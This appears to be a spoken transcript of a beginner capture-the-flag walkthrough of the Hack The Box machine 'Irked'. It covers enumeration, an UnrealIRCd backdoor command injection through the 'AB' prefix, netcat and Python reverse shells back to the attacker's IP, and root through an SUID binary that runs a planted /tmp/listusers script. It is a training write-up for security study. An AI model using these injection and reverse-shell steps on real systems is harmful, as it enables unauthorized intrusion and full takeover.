Hello everyone, this is Mr. Nuts and today we'll be continuing our beginner friendly road to SCP video series. Today we'll be looking at another hack the box machine that is Irked. Irked is based on Linux and the difficulty is easy, so let's just get started. So first thing what I always do is I run an auto recon scan. If you guys don't know what auto recon tool is, and firstly it's available on GitHub so you guys can get it from there. An auto recon is basically an enumeration tool, so it's going to do few nmap scans first, like the full TCP and quick TCP UDP scans, and based on the ports and services open over there, it's going to do additional scans on those ports. Like if port 445 is open, it's going to do additional scans over there, and it will enumerate things for you. So 95% of the time it works really well, but sometimes you have to manually check things. So that's another thing, that you should not always rely on some automated tool, but it's very good to have and I use it always, so I highly recommend it. So another thing is that I will be running this autorecon.py file as root. So that's why I'm giving sudo over here, because otherwise the UDP scan would not work. Then I'll be running this particular file as Python 3, so I'm mentioning that. And the target IP address. So you give the target IP address, that is 10.10.10.117 in the case of Irked. And I'll begin the old switch, that is for output, and the directory where you want to save the file to. Okay, so I already did execute the scan, so let's just look into the scan result and see if we find something. So if you look, I usually just look at the full TCP nmap scan first, and if you see, we have multiple ports open over here. That is port 22 running SSH, 80 running HTTP, 111 running RPC bind, and there are like few IRC and like there's one status port over here. Okay, so obviously first thing I always check that port 80 is present. That's most likely the attack vector always. So since I have this port 80 present, so let's just go and look into it and see what we get. So obviously I go to the web browser, check for it, and we come across this emoji kind of thing, and it says like IRC is almost working. So if we go to view page source as well, we do not get anything except for this location of this JPEG file. So we do not have anything. So what I'll do is, obviously next thing I run a GoBuster scan. And if you guys don't know what GoBuster is, so before that we'll just look at a word list. So I'll be using common txt. This is what I always use first, along with multiple extensions, because the word list consists of only like 4,000 words, I guess. So it's very quick. So most of the time it helps me, but sometimes I have to run the medium scan as well. So I'll use this common txt word list and we cat it, just to show you all that there are multiple directories present over here, right, in the Word file. So there are multiple directories like Word, WordPress, work area. So what GoBuster will do is will give the URL, that is this 10.10.10.117, and it'll probably just check for like work directory present. So GoBuster will ask the server. So server will be like, no, it does not exist. So is work area directory present? So server will be like, yeah, this directory or file does exist, so I'll be sending you that response 200, something like that. Okay, so GoBuster is going to check for multiple 4,000 entries over here along with the extensions. Okay, so if you give the extensions like txt, so it will check for work.txt, then it will check for work.py, something like that. So let's just go and check how we'll run GoBuster scan. So we give GoBuster, we'll be giving the directory switch, then we'll be giving you, and we'll be given the URL, that is 10.10.10.117, and also we'll be given the word list which we had copied earlier, the common txt, and we'll be giving extensions, and that will be since it is Linux box, so we'll give like php, sh, and txt, pl, py, and cgi, probably something. Yeah. And also we can give the output switch where you want to output it as. Always save the output, because you don't have to go and refer, like scroll on top and refer to that the results. So always just give an output and probably just mention it as GoBuster scan. You can mention obviously anything, scan. Okay. So you just execute the scan and it runs. So I already did execute it, so I don't want to run it again. So let's just go and look at the scan results. So if you see over here, we already did execute. We get like a couple of things, three things over here actually. So it's index HTML, manual, server status. So this we do not have access. So obviously it will say permission denied. So we'll go over here and check manual. And if you check index.html as well, so it's gonna load up the same page. So it's not very useful. So we'll do manual, and if we come across this documentation of HTTP web server. the HTTP server. So there's nothing much. If you check out log files or something, you do not find anything interesting. It's still under that manual directory. Okay, so there's nothing much over here. So obviously, if I don't get anything over here in the common txt, I run another scan, that is the medium txt. So we'll look at that as well. But yeah, so this is the scan, but it is like around 2 lakhs word list. Okay, I did run the scan, I did not find anything. So obviously there's nothing present over there, it looks like, for now. Okay, so we do not get anything, and obviously it's time to move on. Like, we don't have to be in the same port, right? Okay, this is probably going to be the attack port. Probably move on. You can check 111 as well, but I could not find anything. You guys can probably go and enumerate over here. Okay, and then we come to these, like, three IRC ports, and there's a status port. So one thing always, that if you see some non-standard port, I think this is a network port itself, but if you see like not very common ports, okay, like 2280 or something, what you do is either you take this and load it up on the HTTP web browser, okay, along with the IP, or you telnet into it, or you netcat into it. So this is what I always do. So obviously I have the 6697 port. Let's just try to telnet into it. Let's just clear this. We're using telnet 10.10.10.117, and also we'll be giving the the port number, that is 6697. So once we telnet into it, it says that it obviously gives us a domain name over here. Okay, so it's like Irked HTTP, and also there is something looking your host name, something like that. Okay, could not resolve. So let's just type some command, probably like help, to get some command list, but you do not get anything. It says you have not registered. So probably always, like, whenever you have some login, obviously you have to log in into it or something, like, some session. So always try to add like user verify, or you try to run those commands. So if you enter user, so it says like not enough parameters, so probably it requires more parameters over here, which, we'll try to authenticate ourselves, but that does not work as well. So we'll just have a look into it, how to enumerate this IRC. Okay, so thing is, you can just take this, add it to your host file, and try to load this web page again, but it's gonna load up that same web page. So there was no luck over here as well. So you guys can go and try it out. But yeah, so we can try this port as well. It's the same thing, nothing different, and as well as this port. So what I'll do is, obviously we get the server version over here. Okay, so first thing, Unreal IRCD. Okay, we get this version, but we do not get the version number. So version as in like whichever service this is running. So let's just go and use search exploit Unreal IRCD, and we come across multiple vulnerabilities, and there is only one version available over here. So most likely it looks like it can be either of these, right? We can ignore these two since they are Windows, and there is one Linux, that is Metasploit, so we'll avoid that as well, and we'll just have a look at this. So if you try and check this out, um, this is a Perl exploit, and this Perl exploit does not really work. But obviously, okay, before that, we'll cd exploit, go to our exploit directory, and then later on, we'll try to copy this Perl exploit. Okay, yes, okay, so we copied that Perl exploit over here. Okay, I'm not sure where did it go. Okay, cd, yes. Okay, so we did copy it now, and if we look at the Perl exploit over here, it says like, there are multiple payload options. Obviously, you have to go through it and understand like what it's doing. So I already did go through it, and in short, you have to probably modify this, because this is kind of a getting, it's getting that payload from this particular website, and then chmod giving permission and trying to execute it. Okay, so this is what it's doing. So this exploit actually did not work for me for some reason. So let's just, I tried to actually use the ping command as well, but it was not, useful for me, and I could not do anything much. So let's just try the ping command over here. Like, what I did was, obviously I removed this, and I tried the ping C to 14.9. That's my particular IP address. I did that, but that did not work for me eventually, and obviously I tried to format it multiple ways, but it did not work. It actually fails. It just sends something, but it does not give us a remote command execution. So this is how you have to actually use this exploit. I was not able to do it. I did it on all the three ports, so that's why I thought, okay, maybe try to find some other way. So obviously, I what I did was before that, we'll just look at the version number of this IRCD. Okay, let's just have let's enumerate this. So we'll do IRC commands. Okay, for some reason. Okay, so we saw that user command was successful, right, over there. So probably just try to search for user command now and check how do we use it. So obviously Control F and check user. It says like user and you have to enter like multiple parameters over here and it gives a reference to a web, a page or something. So let's just try to check it out first and see. And obviously you can go through this entire documentation, but the useful thing lies in like point 4, I guess. So yeah, so if we come over here, it says connection registration. So obviously you have to register ourselves, right? So obviously it says like you have to enter the password first, then nickname as in nickname and user. So you have to enter the password as pass and the secret password and nickname as the nick and the nickname, whatever you want to give. And also the user. So user and probably like you can enter these 4 parameters actually. This is like one name. So if you don't enter this, it's fine. Just enter a single name over here. So this is okay. So let's just use this and obviously you have to do it quickly. So first try to telnet into it. We come across it. Let's just wait for that resolving error. Otherwise it will go up and down. Yeah. So now we'll give a password that is probably we can just enter kindly subscribe. Okay, and then later on, so we do not get any error, right? Last, if you see sometime back, we got an error. It says like user few parameters. So let's just do nick and probably do you did it nuts. And then now you have to give user and you have to give 4 parameters in short. So you can give any of these. It does not matter. It's like par one we can give par two, par 3, par 4. It's not required and you come across this, you are registered over here. And if you see that we are actually having that, version which was present in subspot as well. So probably this is most likely exploitable. So let's see what we can do. We can leave this as it is for now. And let's just try to Google for close this probably. Okay. So let's just check Unreal IRCD exploit. So if we did not have the version number in short, so we could check for that. And we have this nmap script over here, which looks like that it was released after the box was released. So we can just have a look at this first and we can probably go into other exploit. Okay, so try to copy this entire thing because there is some overlapping over here. Copy it. And I think we do not require this anymore, so we can just close it for now. Quit, close, quit. Okay. So sorry, just paste the nmap script and over here it says target, so let's just change that to our attack machines sorry, the target machines IP address, that is 10.10.10.117. This is the entire script for getting a NC file and then running it and then executing it over here. Okay, so let's just do simple thing. What I always follow is what I recommend as well. Always for command injection, try to add the ping command to your attack machine. So at least you'll know. So let's just give one ping count 1. So at least you'll know that the remote command execution was successful. So this is what you have to modify, and obviously don't forget the port number over here. Try to modify that as well because 6697. It's not 6666. Okay, it's 6697. So let's just do that, and before that obviously we'll just set up our TCP dump. If you guys don't know what TCP dump is, so TCP dump is basically a Wireshark. So it's gonna sniff you like command line Wireshark. It's going to sniff your packets which are connections which are coming and going from your attack machine. So I'll be giving the I switch over here. I'll be running it as sudo because you have to run it as root. So I'll be giving the I switch. I'll be giving tunnel 0. That is the interface. I switch for interface, and that is for interface. That is the interface for the HackTheBox VPN. And I'll be giving ICMP packet. Okay, so if you press enter, obviously enter the password. Okay, so we have the connection TCP listening over here. I just entered ICMP because ping packet is ICMP, and I just want to listen to that. Otherwise, it will give me other TCP connections as well. Okay, so what we'll do is I entered the IP wrong over here. That is 14. and that is 9. Yeah. No, I think my IP is 14 and 23. Okay. So we have this IP address over here. Let's just try and see that if we get a remote command execution. So let's just press enter and this thing loads up. Let's say something like sendem command, ABs, unique something, sleeping, and I think this is a Windows command. The script was even meant to run Windows. And then we give our particular command over here. And if we see, we get the request, okay, Irked HTTP request, echo request, that is your ping request, which is coming, sorry, ICMP request. That's a ping request, and that is coming to attack machine. And from attack machine, obviously, we are sending the reply. So that is one ping request, is this, that is sequence one. So that means we have successful remote command execution. So obviously this nmap exploit, when I tried it first, for some reason it did not work on this 6697. Then I tried it on the other port, that is 8067. It did not work over there as well. Then when I came back to 6697 again, it worked. I don't know what was wrong. Maybe it's a box, or I'm not sure what it is, but it is something. So yeah, somehow it was not very reliable, but sometimes it works perfectly. But I'm not sure what's the issue. So we have this script which was sent. Okay, so if you look at it, and obviously, what we'll try to do is we'll just try to enter this script something similar to that, like what we had seen earlier as well, right? In this particular payload, Perl payload. I think the Perl payload did not work because I think it was, shutting down immediately and it was not waiting for some connection. I'm not sure, but yeah. Okay, so let's just get back over here, and what we'll try to do is now we'll try to telnet, sorry, into this, and we'll obviously not register or something now because over here obviously in nmap it did not ask for any registration command or something. So what we'll do is we'll use that AB. Okay, remove that AB, and we'll try to use the ping command which we saw in the Perl exploit as well, right? So we'll use ping 1 10.10.14.23, and if we see, we get successful remote command execution over. So this AB is a critical parameter. So don't change this. This is probably the vulnerable parameter, probably sending something in the backend code and it's giving us remote command execution. So this is what we have. We get remote command execution over here. Okay. So for some reason it went twice, but I'm not sure why. But yeah, we have remote command execution in short. So what we'll do is we do not require TCP dump anymore. So we'll just leave this for now, and we'll try to get our proper shell. Okay, NC NVLP, that 4444. So I'm listening on netcat. If you guys don't know what netcat is a connection. It listens, it can send connection from the attack machine to the target machine, and I'll be giving the port 4444. Okay, so since we have remote command execution, so obviously we'll try to get a netcat shell. So let's just telnet into it, and obviously we'll try to get something from NC itself, like a normal NC shell. You can obviously use the witch and sleep command, which I've shown in the previous videos as well, but yeah, you can try that, but I'll just try to use netcat because I know netcat is present in the box. Okay, so you can do netcat, or you can do just go through all the script, like you can use Python, you can use netcat, you can use Perl, you can use all of these one by one and check what is present. So just do netcat. Okay, so this is the thing, it logs you out very quickly. So probably write it in a cherry tree, and then we can probably paste it. Netcat nc 10.10.14.23 4444, and we'll be giving the e switch, and we'll be giving bin bash. Okay, so we'll be giving that. Okay, paste it. For some reason our shell just got closed immediately. Okay, it says like you have not registered. I'm not sure. Let's type bin sh probably. Okay, so for some reason the shell is coming, but it is getting shut. So what we'll try to do is we'll try to use something different. That is your probably we just go to pentest monkey. Try to use this bash command probably and see if we get something. AB 3 444. Okay, okay, my bad. So will that error thing come out? Cannot resolve your host. Okay. Okay, for some reason this did not work as well. So let's just use something different. That is Python probably. Hmm. And just change the IP address over here. That is 14 and 23. I'm, by mistake remove that bracket. So let's just try to copy this and paste it over here and send it. And we have a shell. For some reason, the netcat, I'm not sure what was the reason for this, but probably I'll have to use this another netcat shell over here, I guess. This one. Okay, so we have a shell, and if we do, who am I? So I think netcat earlier it worked, like when I used the normal netcat one, but I'm not sure why it did not work now. But that's it. Yeah. So sometimes you face issues, so you go to another alternative or something. Okay, so let's just try to get the Python proper shell. So Python C and import pty pty dot spawn bash. Okay. So if you do who am I, we are in the system as IRCD, okay, and if you do just go back to probably the home directory, obviously you can see like there are multiple files present over here in this particular IRCD directory. So you can probably just go back and later on let's just go to the home directory, I guess, pwd. Okay, so we are in the home directory now. And if we see, we do not have a user flag over here. Okay, so let's just go back and like if you see DJ Mardov, so the user DJ Mardov as the user flag, I guess. So let's just go and check. So it's not present in desktop. If you do LSLA, it's not present over here. Let's just go back. Let's go to documents. Okay, and if we do LSLA, our user text is present over here, user flag, but we cannot get our user flag because we do not have permission over here, because we fall into this category over here. Okay, the last three dashes, we fall over here and we do not have any permissions because we fall into the other category, because obviously I don't think we belong, I don't think we belong to the group DJ model, so we belong to IRCD group. So obviously now we need to escalate our privilege probably. So first thing I just manually check uname and get the kernel information, and we have like a 32-bit OS over here. And another thing I obviously checked is sudo l if we can run any commands as sudo, but that is, so it says sudo not found. So what I do is next thing I obviously try and try to get the Linenum script working. So before that I'll just try to, yeah. So let's just get a Linenum script and locate search. Okay, probably just use this. Copy. Okay, so we have Linenum over here now. So we'll just try and upload it to from our attack machine to our target machine. So let's just start a HTTP server. Probably just start it over here. So we'll do Python 3. Okay, before that, obviously just check that it's present in the same directory. It's present in Exploit itself, but just check. Okay, it's present. It has the permission. So let's just go and do Python 3 HTTP server. So we are starting a HTTP server now to transfer files from attack machine to our target machine. Okay, so this is what we can do. Okay, so since we have this, so probably we can just go to a temporary folder or something. You can probably go to dev shm. Okay, so there are a few files over here, we can ignore that. So what we can do is, another thing I just wanted to mention over here, there is this backup folder. Yeah, I just completely forgot. But let's look into this later, because this is useful, but it's not entirely, that's the only way to do it. But let's just look into this backup folder later, okay? So what we'll do is we have dev shm, and we have this particular, sorry, we'll just try to transfer the file. Now we have wget, I guess. Yeah, we have wget. So wget is like basically it was this wget from our target machine on the right terminal is gonna send a HTTP request to this particular attack machine where our lin file is present. Okay, so it's gonna take that and it's gonna obviously try to download it into the system. So in this particular directory, or you can give the O switch to download it anywhere, like wherever you want, wherever you have write access. So probably we can just give 10.10.14.23. That is my attack machine's IP address. We'll be giving the port 8000, that is the same port which we mentioned over here. Make sure you do that. And then give the file name, that is linenum.sh. And you can give the O switch for output, and you can mention the directory, probably TMP or something. But I just want to download it into DevSHM itself. Okay, so we have the file. So let's just make it executable. So let's just, so that it executes. So let's just give chmod. Probably I'll just give 777, and we'll give linenum.sh. Okay, so we have done that. And now probably we can execute that particular linenum and just take this and start the scan. So there are two scans over here. One is a thorough scan, it will give you additional data and the things you have permissions to or something. And one is the normal scan. First I usually run the normal scan, then I run the thorough scan if I do not find anything. So obviously I go into this, like whenever I'm looking into it, first time I go into it, I take some time, analyze it and everything. So you can just check that there are multiple group memberships, contents, but nothing useful over here, nothing useful in, the directories, cron jobs. There's no cron job over here. And yeah, so let's just scroll into it. There are a few listening ports, and sorry, it's listening on local host. Sometimes it's useful, like there's some service running which we can connect to or something like that, but nothing really useful in the processor as well. You can probably just go into it and look in, like just try to enumerate. So if we look into it closely over here, another thing is, yeah, obviously there are like few compilers as well, so probably some kernel exploit can work over here, but I don't want to rely on kernel exploits like to do it. I try to do it in the actual intended way, so let's just ignore this for now. Probably there'll be some kernel exploits. So when we come to this SUID files, okay, set UID. So now what this is, basically, whenever you run, if you guys don't know what SUID is, so whenever you run a file, it's gonna run. Okay, if you check this, it says RWS, that is a user. So it will check and run as the permission of the owner. Okay, so the owner is root, so it's gonna run as root. So that's why this S thing is present over here. And probably if we have execute, if we can execute the file, that is X, so probably we can actually go and execute whatever binary is present over here as the user root. In short, if we have S over here, we have execute in the others, because we do not belong to root and root. So if we belong to the third category, that is others. So if we have this, so we can probably run this particular binary as the user root, in short. So if you look into it, there are like few default binaries, and it's not very useful. So there are like few which stand out, like there are few from 16, 17, 17, and there are like two from 18, that is 2018 Feb, probably when the box in, like around that time when it was released. And there is one from 2018 itself. And so let's just look into it. We have these two things which stand out, so let's just take that. You can obviously check for the SGID as well, so that will be S over here in the groups. Okay, so this is how it is, and let's just copy it into our cherry tree. So whenever I'm solving boxes, my command, sometimes whichever I'm using the most, I try to paste it over here. in cherry tree or something, so that I can easily take, copy paste, modify one thing and paste it over there. So this is what I do. And we have exim 4 as well as this another thing that is May 16, it says like 2018 view user. So probably because it's something very different. It's not something which is found like su and sudo and all those things. I know sudo is not present, but in general it is already present over here in SUID files. Okay, so we do not have this view user. It's something unique. So let's just check it out. Obviously, it took time for me as well to check all these multiple things, and I was actually stuck in escalating to DJ model. Okay, so we can just check these two binaries, just try to execute it. So what we'll do is, let's just go back over here, dev SHM, sorry. And let's just run it. And it says like XM is a mail transfer agent and you can probably use it, you cannot use it from a shell command line. Okay, so it says like some mail transfer agent and you cannot use it from here. So this, I don't know, for some reason it did not work. So what we'll do is we'll try to use this particular view user, okay. So let's just try to run this. And it says like application is being developed something, and it says unknown, some date and time. And then later on it says like you have TMP users not found. Okay, so we got something like not found over here, and it says, so in short, this looks like a directory, this looks like a file, and sh, that is your shell, is giving an error. So the sh is giving an error saying it is not found. So what my next step was, obviously I saw this TMP list users. I thought obviously if we can create a file if it is not found, and we can add a reverse shell over here which says list users, and we can transfer it to the TMP directory. So let's just go to TMP first and see if there is any thing, sorry, as list users. We do not have anything as list users, so let's just create one and try to transfer it on this TMP directory first. So what we'll do is we'll just create a simple Python shell which says list users. Okay, because we'll create the same name, we do not want any different name. Okay, because the name should be same, then only this particular file will execute, right? So what we'll do is we'll just take this simple Python exploit. Okay, paste it over here. You can leave it as it is, or you can probably just try to modify it, or probably we'll just enter this entire thing and we'll just run it as sh. Any reverse shell would work because you can probably mention the environment on top. So I'll just show you all. So we have 14 dot, okay, and we'll give the different port, that is 555 probably. Okay, so we have 555. Okay, so we have this thing over here, and we can go below obviously, and we'll try to run it as, let's just look which sh, we have bin sh over here. So always try to check this because sometime it happens like there is user bin sh or something like that. So we'll just try to have this thing present because we'll try to enter the same thing over here, the environment, right? So it will check, and it will, when it runs this file, so it will check for this. It will be like, oh, this is sh file, so get the sh environment and run this particular thing. Okay, so that's how this thing is gonna work, and probably we can enter bash over here because it's better, because we know bash is present, so I'll just enter bash. Okay, so we have this file ready. What we'll do is let's just check for it, and list user is ready. Okay, so we'll just try to Python HTTP server also is working. So what we'll do is we'll use wget again, 10.10.14.23 and port 8000 because this is 8000, and we'll be giving list users file. Okay, and it has saved. Okay, so if you do lsla, we have this list users files present. So we have the condition, if we saw earlier, we have this condition fulfilled, right? List users. So what we'll do is we'll just try to open another netcat connection, cnvlp 5555. Okay, we'll try to open this and we'll try to see if we get our shell over here. Why 555? Because when the file, right, the list users file, we had entered the port as 555. So that's why. Okay, so let's just see. Obviously, we have this particular binary. So let's just take that user bin view user. Okay, try to paste it and see if we get something. And it says permission denied, obviously, because we forgot another crucial thing, that is chmoded for some reason. Yeah, not for some reason, but there's no executable permission. And we are running it as root, but we need to have that x present to execute. Okay, so we have just give 777 to list users. Okay, try to run it again. And if we see over here, we have our shell as root. So we are in the system as root, and we can go back to probably root directory. And obviously you can get root shell over here because we are as root. Another thing, obviously important thing is go back to cd home, lsla, cd dj model, and okay, and cd documents. So there's a user text present. Obviously, we are in the system as root, so obviously we can read it. We can very well read it. So I just don't want to show that user flag, but you can very well read it. Okay, so now we are over here. We did the box, so we got like user, that is root, and if you see host name, I think it's ID first. I think in the OSCP format you have to mention it this way or something. So we are root, we have UID, we have the system name, host name, that is probably IP config as well. Okay. So let's just close this for now. So in short, we got root privilege, right? So there was this another backup file. I know this is not very OSCP because that that I'll just mention there's like a CTF thing involved in it, but I just want to show you all like how can it you can execute it by chance it happens in OSCP, but I don't think it's a very unlikely scenario. So let's just go to DJ mod of SLA CD documents. Okay, so we have this backup file over here, right? So we did not check it earlier because it was not related to this privilege escalation over here, but obviously it was related to privilege escalation to the user. Like if in case that view user thing did not work for IRCD, we had to try it from DJ Modo. Okay, so probably if DJ Modo was in some special group. So we look at backup and it says that we get a password here, but that password does not obviously belong to root or DJ Modo directly, but it says something like super, let's just close it for now. I don't think we require this. Okay. So it says super elite steg backup PW. So steg is like for steganography. If you guys don't know, you if you guys can probably in steganography, there's an image, right? So whenever there's an image, you can try and hide information behind that image. That image will look as it is, but obviously there'll be like difference in the we say bits behind it. So the least significant and most significant bits. So that is something like I know it's very this. You can probably go and Google it if you guys want to know more. But if you change the most significant bit, so that means the pixel value will change. Okay, 256. So the pixel range is 256 of an image. So if you change the most significant bit, so the value will change a lot. But if you change the least significant bit, okay, so if you that means the lower bit version, like if the pixel value is 122 and then you change it to 123, so that does not make very huge difference. But if the pixel value is 122 and probably the most if you change the most significant bit for some reason the pixel value goes to around 200. So from 120 to 200 is a huge difference and that is very noticeable. So that's why you do not use the most significant bit, you use the least significant bit. So this is something I think out of scope of OSCP, but yeah, just since it is there in the box and I think this was the intended method to do this, so let's just do it. So this is tag over here. It says that it's a backup password, but where's the image, right? So obviously the image was the earlier picture which we saw because that's the only JPEG image which we have over here. So what we can do is just so we can save image directly, or just another way is like you can go to this take this, copy it, okay, go to our exploit folder, use wget over here and probably just use 14.23 port 80, just mentioning a port, and jpeg. Okay, my bad. I am entering my attack machine's IP address. That's my bad. Okay. So we got the image over here. Obviously, we have this org. So in order to get the password extracted from that, we'll be using stake hide. So we can use stake hide to hide things as well as extract things. So we'll be using the extract module over here, like the extract option. And we'll be giving the SF switch for stego file which we are feeding that org. Okay, so let's just quickly write steg hide extract, then SF, and the file name, that is orked jpeg. We can even give the passphrase which we found over here, right? So let's just copy this, paste this, and it says load extracted data to parse.txt. So let's just look at the parse.txt and we get this particular password. And since we in Linux, when we want to go to another user, right, you want to switch users, so you do su and you probably enter the username, that is DJ Modo, and we have this, we enter the password, and we are in the system as DJ Modo. And same thing, you can obviously run that linenum script. Okay, so this was the box, and I know this CTF thing was, I think, optional if you guys want to look into it, but we can easily do it from IRCD user itself. You do not require the CTF component over here. Okay, so this was the box, and if you guys like the video, please do give a thumbs up. And if you guys want to see more upcoming videos on, the Hack the Box OSCP series, so do subscribe to me as well. Okay, thanks a lot.